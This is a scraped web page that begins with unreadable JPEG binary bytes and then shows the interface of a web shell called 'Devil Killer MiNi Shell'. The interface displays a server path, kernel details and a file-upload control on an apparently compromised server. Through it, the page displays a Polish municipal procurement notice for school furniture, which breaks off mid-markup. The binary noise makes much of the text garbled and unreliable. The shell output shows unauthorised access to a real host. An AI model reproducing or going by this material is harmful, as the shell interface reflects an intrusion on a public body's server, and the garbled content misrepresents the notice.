JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240722/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240722/0042404701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wyposażenia do Zespołu Szkół Technicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 54 414 00 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wloclawek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wyposażenia do Zespołu Szkół Technicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0936dbce-f0e2-4c73-bb6d-a45348e957f9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00424047</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00062932/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa wyposażenia do Zespołu Szkół Technicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umwloclawek.logintrade.net/zapytania_email,171321,38eafe532760cde72fb5b9e2f7684021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz<br/>za pomocą poczty elektronicznej, z zastrzeżeniem pkt. 3.<br/>3. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie<br/>Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, w<br/>wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>4. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej<br/>Zamawiającego: zamowienia@um.wloclawek.pl, z zastrzeżeniem pkt. 3</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy<br/>Przetargowej Urzędu Miasta Włocławek przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja korzystania z Platformy Przetargowej Urzędu Miasta Włocławek dostępna jest pod adresem:<br/>https://umwloclawek.logintrade.net/rejestracja/instrukcje.html.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Urzędu Miasta Włocławek ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na<br/>zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek:<br/>1) dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b) Google Chrome 31,<br/>c) Mozilla Firefox 26,<br/>d) Opera 18;<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet,<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>c) włączona obsługa JavaScript,<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e) zainstalowany Acrobat Reader,<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.,<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies S.A.<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4) dopuszczalne formaty przesyłanych danych: Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji<br/>elektronicznej przesyła się w formatach danych określonych w przepisach wy-danych na podstawie § 2 ust. 1 i 2 rozporządzenia<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.). Równocześnie Zamawiający rekomenduje na format danych<br/>przesyłanych plików: *.pdf.<br/>5) maksymalny rozmiar pojedynczego pliku: 150 MB, przy czym nie określa się limitu liczby plików.<br/>5. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>6. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej<br/>Zamawiającego: zamowienia@um.wloclawek.pl<br/>7. Zamawiający zaleca, aby nazwa plików lub katalogów przesyłanych Zamawiającemu przy użyciu Platformy Przetargowej Urzędu<br/>Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz za pomocą poczty<br/>elektronicznej zawierała maksymalnie 50 znaków.<br/>8. W przypadku niezastosowania się przez Wykonawcę do zalecenia Zamawiającego, o którym mowa w pkt 7, Wykonawca<br/>przyjmuje na siebie wyłączne ryzyko braku możliwości otwarcia przez Zamawiającego przesłanego pliku lub katalogu, a tym samym<br/>ryzyko braku możliwości zapoznania się przez Zamawiającego treścią przesłanego pliku lub katalogu.<br/>9. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1: Meble szkolne<br/><br/><br/>1.	Mikroskop cyfrowy – 1<br/>2.	Mikroskop – 1<br/>3.	Programy multimedilane Fizyka, Chemia, Biologia i Geografia – 1<br/>4.	Zasoby multimedialne Instrukcje BHP – 1<br/>5.	Krzesło konferencyjne popielato - czarne, siedzisko i oparcie kolor szary – 27<br/>6.	Krzesło konferencyjne czarne – 4<br/>7.	Krzesło obrotowe szare – 26<br/>8.	Fotel obrotowy beżowy – 2<br/>9.	Fotel obrotowy szary – 15<br/>10.	Krzesło szare – 9<br/>11.	Krzesło 2-osobowe, jasnobeżowe – 1<br/>12.	Plansza dwustronne – Polska - symbole narodowe, prezydenci – 1<br/>13.	Plansza dwustronna – Rzeczpospolita Polska - historia najnowsza – 1<br/>14.	Plansza - Polskie zabytki UNESCO – 1<br/>15.	biurko z szeroką szufladą - białe, w białej skrzyni – 1<br/>16.	Taboret bukowy roz. 6 – 4<br/>17.	Szafka na ksero – klon – 1<br/>18.	Prosta lada recepcyjna lewa - klon do biblioteki – 1<br/>19.	Prosta lada recepcyjna prawa - klon do biblioteki – 2<br/>20.	Nadstawka do prostej lady recepcyjnej - klon do biblioteki – 1<br/>21.	Biurko z jedną szufladą – klon – 2<br/>22.	Stolik pod rzutnik – klon – 2<br/>23.	Szafa z witryną – biały – 2<br/>24.	Szafa z witryną klon – 2<br/>25.	Szafka-słupek mobilna – 1<br/>26.	Szafka pod duże ksero – 23<br/>27.	Szafka laboratoryjna do pracowni mobilna – 1<br/>28.	Szafa ubraniowa z 2 schowkami i drzwiami biało-szarymi - klon jutland – 1<br/>29.	Krzesło białe rozm. 6, stelaż szary – 2<br/>30.	Krzesło szare rozm. 6, stelaż szary – 68<br/>31.	Krzesło klonowe rozm. 6, stelaż szary – 15<br/>32.	Taboret rozm. 7 z podnóżkami o możliwości regulacji rozmiar 3-6, HPL biały – 4<br/>33.	Drzwi niskie 90 stopni, 2 szt. - klon jutland – 6<br/>34.	Drzwi niskie 90 stopni, 2 szt. – białe – 2<br/>35.	Drzwi niskie 90 stopni, 2 szt. – szare – 2<br/>36.	Drzwi średnie 90 stopni z zamkiem 2 szt. - klon jutland – 23<br/>37.	Drzwi średnie 90 stopni, 2 szt. – białe – 1<br/>38.	Drzwi średnie 90 stopni z zamkiem 2 szt. – białe – 10<br/>39.	Drzwi średnie 90 stopni 2 szt. – szare – 2<br/>40.	Drzwi średnie 90 stopni z zamkiem 2 szt. – szare – 15<br/>41.	Drzwi wysokie 90 stopni 2 szt. - klon jutland – 1<br/>42.	Drzwi wysokie 90 stopni z zamkiem 2 szt. - klon jutland – 48<br/>43.	Drzwi wysokie 90 stopni z zamkiem 2 szt. – białe – 6<br/>44.	Drzwi wysokie 90 stopni z zamkiem 2 szt. – szare – 12<br/>45.	Nadstawka - klon jutland – 21<br/>46.	Nadstawka - klon jutland – 29<br/>47.	Nadstawka - klon jutland – 19<br/>48.	Regał - klon jutland – 58<br/>49.	Regał głęboki - klon jutland – 2<br/>50.	Regał - klon jutland – 74<br/>51.	Regał głęboki - klon jutland – 2<br/>52.	Słupek z szufladami - klon jutland – 2<br/>53.	Drzwi witrynowe – 17<br/>54.	Drzwi witrynowe – 19<br/>55.	Drabina przestawna do mebli – 1<br/>56.	Uchwyt na drabinę do mebli – 1<br/>57.	Stół trójkątny o rozmiarze nr 6 – 30<br/>58.	Stół prostokątny nr 6 – 1<br/>59.	Szafa ubraniowa 1 os. klon jutland – 3<br/>60.	Szafka kuchenna – 5<br/>61.	Szafka kuchenna ze zlewozmywakiem – 2<br/>62.	Drzwi do szafki kuchennej, 2 szt. – 7<br/>63.	Szafka kuchenna z 3 białymi szufladami – 2<br/>64.	Blat kuchenny do szafek – 1<br/>65.	Kontenerek z piórnikiem, klon - na nóżkach – 21<br/>66.	Dostawka do biurka – lewa – 1<br/>67.	Blat kuchenny do szafek, 164 cm - z wycięciem na zlew po lewo – 1<br/>68.	Blat kuchenny do szafek, 164 cm - z wycięciem na zlew po prawo – 1<br/>69.	Regał z 12 szufladami - klonowo-biały – 3<br/>70.	Blat kuchenny do szafki, 82 cm – 1<br/>71.	Drzwi średnie 90 stopni z zamkiem 2 szt. – ciemnoturkusowe – 2<br/>72.	Drzwi wysokie 90 stopni z zamkiem 2 szt. – brudnoróżowe – 2<br/>73.	Drzwi wysokie 90 stopni 2 szt. – jasnoniebieskie – 1<br/>74.	Drzwi wysokie 90 stopni z zamkiem 2 szt. – ciemnoturkusowe – 4<br/>75.	Szafa skrytkowa z 14 schowkami, cichy domyk - klon jutland – 3<br/>76.	Kontenerek z piórnikiem i kartoteką – klon – 2<br/>77.	Kontenerek z piórnikiem i szufladami – klon – 1<br/>78.	Biurko narożne prawe z metalową nogą, klon jutland – 7<br/>79.	Biurko narożne lewe z metalową nogą, klon jutland – 4<br/>80.	Biurko – klon – 2<br/>81.	Szafa ubraniowa z drzwiami – 1<br/>82.	Zestaw mebli do pokoju nauczycielskiego – 1<br/>83.	Moduł szatniowy – 1<br/>84.	Szafka z 5 schowkami – 1<br/>85.	Regał niski z półkami – 2<br/>86.	Lustro poziome – 1<br/>87.	Fotel 1 os. – ciemnoszary – 5<br/>88.	Kanapa wyciszająca z bokami ze sklejki – 3<br/>89.	Tablica biała suchościeralna ceramiczna 1700x1000 mm – 31<br/>90.	Tablica biała suchościeralna magnetyczna lakierowana – 1<br/>91.	Tablica szkolna tryptyk biała ceramiczna – 3<br/>92.	Tablica suchościeralno-magnetyczna obrotowo-jezdna ceramiczna 170x100 cm - 1<br/>93.	Tablica akademicka suchościeralno-magnetyczna lakierowana 350x120 – 1<br/>94.	Krzesło roz. 6 zielone – 28<br/>95.	Krzesło roz. 6 niebieskie – 32<br/>96.	Krzesełko rozm. 6 – szare – 2<br/>97.	Krzesełko zawieszane rozm. 6 – szare – 32<br/>98.	Krzesło obrotowe na kółkach z regulacją wysokości – szare – 172<br/>99.	Krzesło obrotowe z regulacją wysokości – szare – 60<br/>100. Zestaw trygonometryczny do tablic – 3<br/>101.	Tablica magnetyczna biała na stojaku wym. 150 x 90 x 168 cm – 1<br/>102.	Zestaw brył matematycznych, 17 szt. – 3<br/>103.	Metalowa szafa aktowa 80 – 1<br/>104.	Szafa chemiczna niska z półkami z blachy ocynkowanej – 1<br/>105.	Kosz na śmieci, pijemnik do segregacji modułowy z pokrywą – pięciokomorowy – 6<br/>106.	Fotel konferencyjny na kółkach – 5<br/>107.	Moduł kanapa 3-osobowa z oparciem, jasnoszary – 1<br/>108.	Hoker z oparciem – 2<br/>109.	Pufa 2-osobowa grafitowa na korytarz – 2<br/>110.	Pufa 3-osobowa grafitowa na korytarz – 4<br/>111.	Oparcie podwójne wysokie grafitowe na korytarz – 1<br/>112.	Podłokietnik z blatem grafitowe na korytarz – 4<br/>113.	Stolik duży wysoki biały 130x50x110 – 1<br/>114.	Łącznik metalowy do łaczenia puf na korytarz – 10<br/>115.	Zestaw siedzisk na hol – 1<br/>116.	Krzesło – szare – 8<br/>117.	Kwadrat wyciszający - jasnoszary, gr. 20 mm na ścianę – 6<br/>118.	Kwadrat wyciszający - jasnoszary, gr. 40 mm na ścian – 6<br/>119.	Kwadrat wyciszający - zielony, gr. 50 mm na ścianę – 6<br/>120.	Gablota stojąca na nóżkach dwudrzwiowa 120 x 180 x 50 popielata (na puchary) – 1<br/>121.	Gablota stojąca na nóżkach jednodrzwiowa 60 x 180 x 50 – 1<br/>122.	Szafka z umywalką 60 – 1<br/>123.	Stół kwadratowy 70x70, brzoza, zaokrąglony, rozm. 6 – 6<br/>124.	Stół kwadratowy 70x70, HPL - biały, zaokrąglony, rozm. 6 – 2<br/>125.	Stół prostokątny 140x70, HPL - buk, zaokrąglony, rozm. 6 – 1<br/>126.	Stół 160x80 rozm. 6, 8os., stelaż aluminium, blat buk, obrzeże ABS, narożniki proste – 1<br/>127.	Stół 130x50 rozm. 6, 2os., stelaż aluminium, blat klon, Obrzeże ABS, narożniki proste – 17<br/>128.	Stół 130x50 rozm. 6, 2os., stelaż aluminium, blat HPL biały, obrzeże drewniane, narożniki pro-ste – 14<br/>129.	Stół 130x50 rozm. 6, 2os., stelaż aluminium, blat HPL buk, obrzeże drewniane, narożniki pro-ste – 234<br/>130.	Stół 130x50 rozm. 6, 2os., stelaż aluminium, blat HPL szary, obrzeże drewniane, narożniki proste – 15<br/>131.	Stół 130x50 rozm. 6, 2os., stelaż aluminium, blat HPL szary, obrzeże drewniane, narożniki proste – 16<br/>132.	Stolik komputerowy z półką na komputer i szufladą na klawiaturę klon, stelaż aluminium – 143<br/>133.	Stolik komputerowy z półką na komputer i szufladą na klawiaturę - klon, stelaż aluminium – 19<br/>134.	Szafa wysoka czterodrzwiowa - klon, zamykana na klucz – 1<br/>135.	Regał wysoki z szafką – klon – 1<br/>136.	Szafa wysoka z witryną – klon – 1<br/>137.	Regał średni z szafką – klon – 1<br/>138.	Regał średni – klon – 3<br/>139.	Szafa niska – klon – 4<br/>140.	Szafa wysoka z min. 10 schowkami – klon – 1<br/>141.	Szafa ubraniowa – klon – 2<br/>142.	Biurko 140 - klon na metalowych nogach – 4<br/>143.	Biurko 160 - klon na metalowych nogach – 24<br/>144.	Biurko 180 - klon na metalowych nogach – 1<br/>145.	Osłona pełna klon do biurek na metalowych nogach – 1<br/>146.	Osłona pełna klon do biurek na metalowych nogach – 23<br/>147.	Wózek pod komputer – klon – 42<br/>148.	Panel recepcyjny - klon do sekretariatu – 1<br/>149.	Kontenerek z piórnikiem i kartoteką – klon – 1<br/>150.	Kontenerek z piórnikiem – klon – 4<br/>151.	Regał - klon – 1<br/>152.	Szafa wąska prawa z zamkiem – 1<br/>153.	Szafa wysoka z zamkiem na segregatory – 1<br/>154.	Szafa z witryną z zamkiem – 1<br/>155.	Szafka wąska lewa – 1<br/>156.	Szafa wąska lewa z zamkiem – 1<br/>157.	Narożna lada recepcyjna klon do biblioteki – 1<br/>158.	Nadstawka narożnej lady recepcyjnej klon – 1<br/>159.	Stojak na mapy – klon – 1<br/>160.	krzesło rozmiar 6 - stelaż aluminium - buk – 474<br/>161.	Stół konferencyjny rozmiar 6, lewy, klon – 2<br/>162.	Stół konferencyjny rozmiar 6, prawy, klon – 2<br/>163.	Stół konferencyjny rozmiar 6, prosty, klon – 4<br/>164.	Półka na komputer do stolików komputerowych srebrna – 16<br/>165.	Stolik komputerowy, 2 os. 1300x450 z regulowaną wysokością 3-7 - srebrny – klon - 8<br/>166.	Regał magazynowy wzmocniony - moduł podstawowy, kolor ramy siwy, półki buk – 2<br/>167.	Regał biblioteczny dwustronny wzmocniony - moduł dodatkotkowo wzmocniony – 4<br/>168.	Regał dwustronny wzmocniony - moduł podstawowy wzmocniony – 4<br/>169.	Zestaw meblowy 4 regały z szufladami oraz drzwiami – 1<br/>170.	Stół 120 x 80 klon z 6 krzesłami aluminium, rozm. 6 – 1<br/>171.	Zestaw mebli do biblioteki klon jutland – 1<br/>172.	Zestaw mobilny do pracy indywidualnej - biurko z szafką – 3<br/>173.	Regał z dzwiami – 2<br/>174.	Zestaw mebli kuchennych z zamkiem – 1<br/>175.	Szafka kuchenna ze zlewozmywakiem – 1<br/>176.	Krzesło konferencyjne, z podłokietnikami – 4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39160000-1 - Meble szkolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 